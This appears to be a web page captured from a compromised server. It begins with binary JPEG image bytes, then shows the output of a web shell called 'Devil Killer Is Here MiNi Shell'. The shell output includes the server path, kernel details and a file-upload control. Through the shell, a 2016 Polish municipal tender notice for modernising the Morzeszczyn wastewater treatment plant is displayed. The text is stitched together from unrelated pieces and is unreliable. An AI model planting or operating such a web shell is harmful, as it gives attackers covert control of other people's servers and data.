JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160707/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160707/123671-N-2016.html

<p class="kh_header"><b>Morzeszczyn: Modernizacja oczyszczalni ścieków w m. Morzeszczyn</b><br>
<b>Numer ogłoszenia: 123671 - 2016; data zamieszczenia: 07.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Morzeszczyn , ul. 22 Lipca 4, 83-132 Morzeszczyn, woj. pomorskie, tel. 058 5362724 w. 14, faks 058 5362792.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.morzeszczyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja oczyszczalni ścieków w m. Morzeszczyn.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest  wykonanie modernizacji oczyszczalni ścieków w Morzeszczynie 
polegającej na zmianie technologii i jakości oczyszczania ścieków zgodnie z projektem  budowlanym zatwierdzonym decyzją Starosty Tczewskiego  znak WB.6740.1.187.2013 z dnia  31 grudnia 2013 roku wraz z projektem zamiennym zatwierdzonym decyzją Starosty Tczewskiego znak WB.6740 .9.2.2016 z dnia 2 maja 2016 r. 

     W zakres inwestycji wchodzi  wykonanie następujących robót   :
         - przygotowanie placu budowy
         - wykonanie robót przygotowawczych i rozbiórkowych
         - rozbudowa i modernizacja istniejących reaktorów biologicznych                                           
         - wykonanie robót budowlanych na  zbiorniku przepompowni, zbiorniku rezerwowym i komorze 
            operacyjnej
         - budowa budynku socjalno-technologicznego w ramach którego nastąpi wykonanie: 
            -  robót budowlanych
            -  instalacji wod-kan
            -  instalacji elektrycznych 
       
       
         - wykonanie robót dot. uzbrojenia zewnętrznego
         - wykonanie robót  z zakresu technologii obiektu poprzez budowę:
            -   punktu zrzutu ścieków dowożonych
            -   ciągu dopływu ścieków surowych
            -   przepompowni technologicznej
            -   sito-piaskownika
            -   reaktora biologicznego
            -  odpływu  ścieków oczyszczonych do odbiornika wraz z wylotem i pomiarem 
                przepływu  
            -  i instalację stacji dmuchaw napowietrzających i wytłaczjących ścieki
            -  stopnia chemicznego oczyszczania ścieków
            -  systemu do odwadniania osadu
            -  instalacji systemu zasilania i sterowania pracą oczyszczalni
            -  rurociągów technologicznych
         - rozruch technologiczny oczyszczalni
         - wykonanie robót elektrycznych zakres których obejmuje:
            - wykonanie wewnętrznej lini zasilającej
            - wykonanie oświetlenia zewnętrznego - oświetlenie terenu
            - odbiory techniczne
         -budowa dróg -droga dojazdowa wraz ze zjazdem - placów , parkingów , zagospodarowanie 
             terenu -zieleń
         - prace wykończeniowe

2.	Podczas prowadzenia prac od momentu przekazania placu budowy, do czasu przekazania  protokołem odbioru końcowego zmodernizowanej oczyszczalni Zamawiającemu, Wykonawca zabezpiecza oczyszczanie ścieków i odpowiada za jakość ścieków oczyszczonych.
Koszty związane z bieżącą obsługą istniejącej oczyszczalni (opłaty środowiskowe, analizy ścieków) , korzystanie z energii elektrycznej oraz zagospodarowanie odpadów dot. skratek, zawartości piaskowników oraz ustabilizowanych osadów ściekowych ponosi Zamawiający.
Pozostałe odpady powstałe w wyniku prowadzenia robot budowlanych ( gruz, złom , itp.) Wykonawca usunie na własny koszt i przekaże Zamawiającemu Kartę przekazania odpadu potwierdzającą zagospodarowanie odpadów zgodnie z przepisami odrębnymi.
          
3.	Szczegółowy zakres prac oraz warunki realizacji zamówienia precyzują :
-  Specyfikacja Istotnych Warunków Zamówienia 
-  Specyfikacja Techniczna Wykonania i Odbioru Robót Budowlanych 
           -  Projekt techniczny  + opis
           -  Przedmiar Robót 
           -  Wzór umowy.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Stosownie do art. 67 ust. 1 pkt. 6 uzp.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.25.21.27-4, 45.23.24.21-9, 45.10.00.00-8, 45.20.00.00-9, 45.23.24.40-8, 45.30.00.00-0, 45.40.00.00-1, 45.23.31.40-2, 45.31.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> .  Każdy Wykonawca zobowiązany jest zabezpieczyć swą ofertę wadium w wysokości  
   90.000,00  zł   ( słownie : dziewięćdziesiąt tysięcy  złotych  00/100 )  
 2.  Wadium należy wnieść przed upływem terminu składania ofert , przy czym wniesienie wadium w 
      pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne tylko 
      wówczas, gdy znajdzie się na rachunku Zamawiającego przed upływem terminu składania ofert.

 3.  Wadium może być wnoszone w jednej lub kilku z poniżej podanych form: 
        
         1)    pieniądzu
        2)    w poręczeniach bankowych lub spółdzielczej kasy oszczędnościowej
        3)    gwarancjach bankowych 
        4)    w gwarancjach ubezpieczeniowych
        5)    w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt 2   ustawy z  
               dnia  9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości
              (Dz. U. Z 2016 r. poz. 359)

  4.  Sposób wniesienia wadium w pieniądzu  :
       W przypadku wniesienia  wadium w pieniądzu, należy je wpłacić przelewem na konto   
        Zamawiającego  numer   B.S. Skórcz o/Pelplin  51 8342 0009 2011 5339 2000 0002 
         z adnotacją WADIUM - Modernizacja oczyszczalni Morzeszczyn 
        przed upływem terminu składania ofert, przy czym za termin wniesienia wadium w formie   
        przelewu pieniężnego przyjmuje się termin uznania na rachunku Zamawiającego.

   5.  Zatrzymanie wadium
1) Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3, co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej

2)Wykonawca, którego oferta została wybrana 
- odmówił podpisania umowy
- nie wniósł wymaganego zabezpieczenia należytego wykonania umowy
- zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy

   6. Wadium w formie innej niż w pieniądzu należy składać jako kopię potwierdzoną za zgodność z  
       oryginałem lub oryginalny dokument wraz z ofertą ( wskazane jest aby oryginał umieszczany był w  
       osobnej kopercie) . 
       Dokument wniesienia wadium powinien wskazywać przypadki, w których Zamawiający ma prawo  
       zatrzymać wadium zgodnie z art. 46 ust. 4a i ust. 5 ustawy Prawo zamówień publicznych.
       Dokument w formie poręczenia winien zawierać stwierdzenie, że na pierwsze pisemne żądanie  
       zamawiającego wzywające do zapłaty wadium, zgodnie z warunkami przetargu, następuje jego   
       bezwarunkowa wypłata bez jakichkolwiek zastrzeżeń.
       
Zgodnie z wymogami ustawy Pzp oraz instytucji wydających poręczenia , oryginalny dokument zostanie zwrócony Wykonawcy. W związku z powyższym  nie należy go trwale wpinać do oferty. Do oferty należy wpiąć kopię , która pozostanie u Zamawiającego.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie  ww. warunku , jeżeli Wykonawca złoży oświadczenie o spełnieniu    
  warunku udziału w postępowaniu z art. 22 ust. 1 pkt. 1-4 ustawy - zgodnie z Załącznikiem nr 2  
  do SIWZ ( w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez 
  dwóch lub więcej Wykonawców wyżej wymieniony dokument Wykonawcy składają wspólnie .)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna w/w warunek za spełniony, jeżeli Wykonawca wykaże, że posiada wiedzę i  
        doświadczenie w zakresie niezbędnym do oceny spełnienia przez Wykonawcę powyższego 
        warunku, a w szczególności , że  w okresie ostatnich pięciu lat przed upływem terminu  
        składania ofert  albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli  okres  
        prowadzenia działalności jest krótszy - w tym okresie, wykonał  co najmniej  1 robotę  
        budowlaną w zakresie  budowy, rozbudowy lub modernizacji oczyszczalni ścieków  o wartości 
        nie mniejszej niż 2.000.000,00 zł netto  , obejmującej wykonanie oczyszczalni w technologii opartej 
        na zbiornikach SBR (reaktor biologiczny)  
        Wykazana przez Wykonawcę robota musi być wykonana z  należytą starannością , zgodnie z 
         zasadami sztuki budowlanej i prawidłowo ukończona.  
         W celu potwierdzenia spełnienia powyższego warunku Wykonawca zobowiazany jest przedłożyć 
         Zamawiającemu :
            - oświadczenie jak w  w pkt. VI ppkt. 1  
            - wykaz robót wykonanych w okresie ostatnich 5 lat przed upływem terminu składania ofert , a     
              jeżeli okres prowadszenia działalności jest krótszy - w tym okresie sporządzony wg. wzoru 
              stanowiącego Załacznik nr 4 do SIWZ wraz z dowodami ich wykonania (poświadczenia 
              wykonania).
    W przypadku zamówień na roboty budowlane - inne dokumenty - jeżeli z uzasadnionych przyczyn o   
    obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia .
    W przypadku gdy Zamawiajacy jest podmiotem , na rzecz którego roboty budowlane wskazane w  
    wykazie robót, zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów 
    , o których mowa powyżej.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie dysponowania odpowiednim potencjałem technicznym . Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych 
        do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, 
        niezależnie od charakteru prawnego łączącego go z nimi stosunków. Wykonawca w takiej 
        sytuacji zobowiązany jest udowodnić Zamawiającemu , iż będzie dysponował tymi zasobami w  
        trakcie realizacji zamówienia , w szczególności przedstawiając  w tym celu pisemne 
        zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby 
       wykonania  zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie  ww. warunku , jeżli Wykonawca w celu spełnienia warunku wykaże   
 że dysponuje osobami zdolnymi do wykonania przedmiotu zamówienia   .  
       W celu potwierdzenia spełnienia powyższego warunku  Wykonawca zobowiązany jest przedłożyć   
       Zamawiającemu :
         -  oświadczenie jak w  w pkt. VI ppkt. 1  
         -  wykaz osób którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w        
            wykonywaniu zamówienia wraz z informacjami ich kwalifikacji zawodowych, doświadczenia i 
            wykształcenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez  
            nie czynności , na formularzu zgodnym z wzorem  stanowiącym  Załącznik nr 5 w tym 
            obowiązkowo:
         - dysponowanie 1 osobą na stanowisku Kierownika budowy posiadającej wykształcenie średnie 
lub wyższe techniczne , posiadającej uprawnienia do kierowania robotami w specjalności konstrukcji  budowlanych ( Rozporządzenie Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r.  w sprawie samodzielnych funkcji technicznych budownictwie - Dz. U. Nr 83, poz. 578) lub odpowiadające im uprawnienia, które zostały wydane na podstawie wcześniej wydanych przepisów, które upoważniają do pełnienia funkcji kierowania robotami w specjalności konstrukcji budowlanych, 
        -  dysponowanie 1 osobą na stanowisku Kierownika robót posiadającej wykształcenie średnie lub wyższe techniczne , posiadającej uprawnienia do kierowania robotami w specjalności sanitarnej 
            bez ograniczeń ( Rozporządzenie Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r.  w sprawie samodzielnych funkcji technicznych budownictwie - Dz. U. Nr 83, poz. 578) lub odpowiadające im uprawnienia, które zostały wydane na podstawie wcześniej wydanych przepisów, które upoważniają do pełnienia funkcji kierowania robotami w specjalności sanitarnej, 
         - dysponowanie 1 osobą na stanowisku Kierownika robót posiadającej wykształcenie średnie lub 
           wyższe techniczne , posiadającej uprawnienia do kierowania robotami w specjalności 
           elektrycznej ( Rozporządzenie Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r.  w 
           sprawie samodzielnych funkcji technicznych budownictwie - Dz. U. Nr 83, poz. 578) lub 
           odpowiadające im uprawnienia, które zostały wydane na podstawie wcześniej wydanych      
           przepisów, które upoważniają do pełnienia funkcji kierowania robotami w specjalności 
            elektrycznej, 
        - dysponowanie 1 osobą na stanowisku Geodety posiadającej wykształcenie średnie lub wyższe 
           techniczne , posiadającej uprawnienia geodezyjne tj. uprawnienia do sprawowania 
           samodzielnych funkcji technicznych o których mowa w ustawie Prawo geodezyjne i 
            kartograficzne . Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych 
        do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, 
        niezależnie od charakteru prawnego łączącego go z nimi stosunków. Wykonawca w takiej 
        sytuacji zobowiązany jest udowodnić Zamawiającemu , iż będzie dysponował tymi zasobami w  
        trakcie realizacji zamówienia , w szczególności przedstawiając  w tym celu pisemne 
        zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby 
       wykonania  zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ww warunek za spełniony, jeżeli Wykonawca wykaże, że się posiadaniem  
1)	sprawozdania finansowego albo jego części, a jeżeli podlega ono badaniu przez biegłego   
rewidenta zgodnie z  przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w   przypadku wykonawców nie zobowiązanych do sporządzania sprawozdania finansowego innych dokumentów określających obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie trzy lata obrotowe, a jeżeli  okres prowadzenia działalności jest krótszy - za ten okres,  z  którego wynika, że Wykonawca osiągnął średni roczny przychód na podstawie Rachunku zysku i strat pozycja  Przychód netto ze sprzedaży produktów towarów i materiałów lub Przychód netto ze sprzedaży  i zrównane z nimi lub w przypadku Wykonawców nie zobowiązanych do sporządzania sprawozdania finansowego - średni obrót roczny z okresu ostatnich trzech lat obrotowych, a jeżeli okres prowadzenia działalności jest krótszy - z tego okresu, potwierdzony oryginałami lub kserokopiami dokumentów w składanej ofercie, w wysokości nie mniejszej niż 3 mln zł.  
2)	opłaconej polisy, a w przypadku jej braku innym dokumentem potwierdzającym, że wykonawca jest ubezpieczony od  odpowiedzialności cywilnej w zakresie prowadzonej działalności na wartość min. 2 000 000,00 zł.
3)	informację z banku lub spółdzielczej kasy oszczędnościowo - kredytowej w którym(-ej)    Wykonawca posiada rachunek, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, potwierdzającą  posiadanie środków finansowych lub zdolności kredytowej w wysokości min. 500 000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">sprawozdanie finansowe w części, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości, również opinię odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego, innych dokumentów określających obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 3 lata obrotowe, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">sprawozdanie finansowe w części, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości, również opinię odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku podmiotów niezobowiązanych do sporządzania sprawozdania finansowego, innych dokumentów określających obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 3 lata obrotowe, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres;</li>

			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
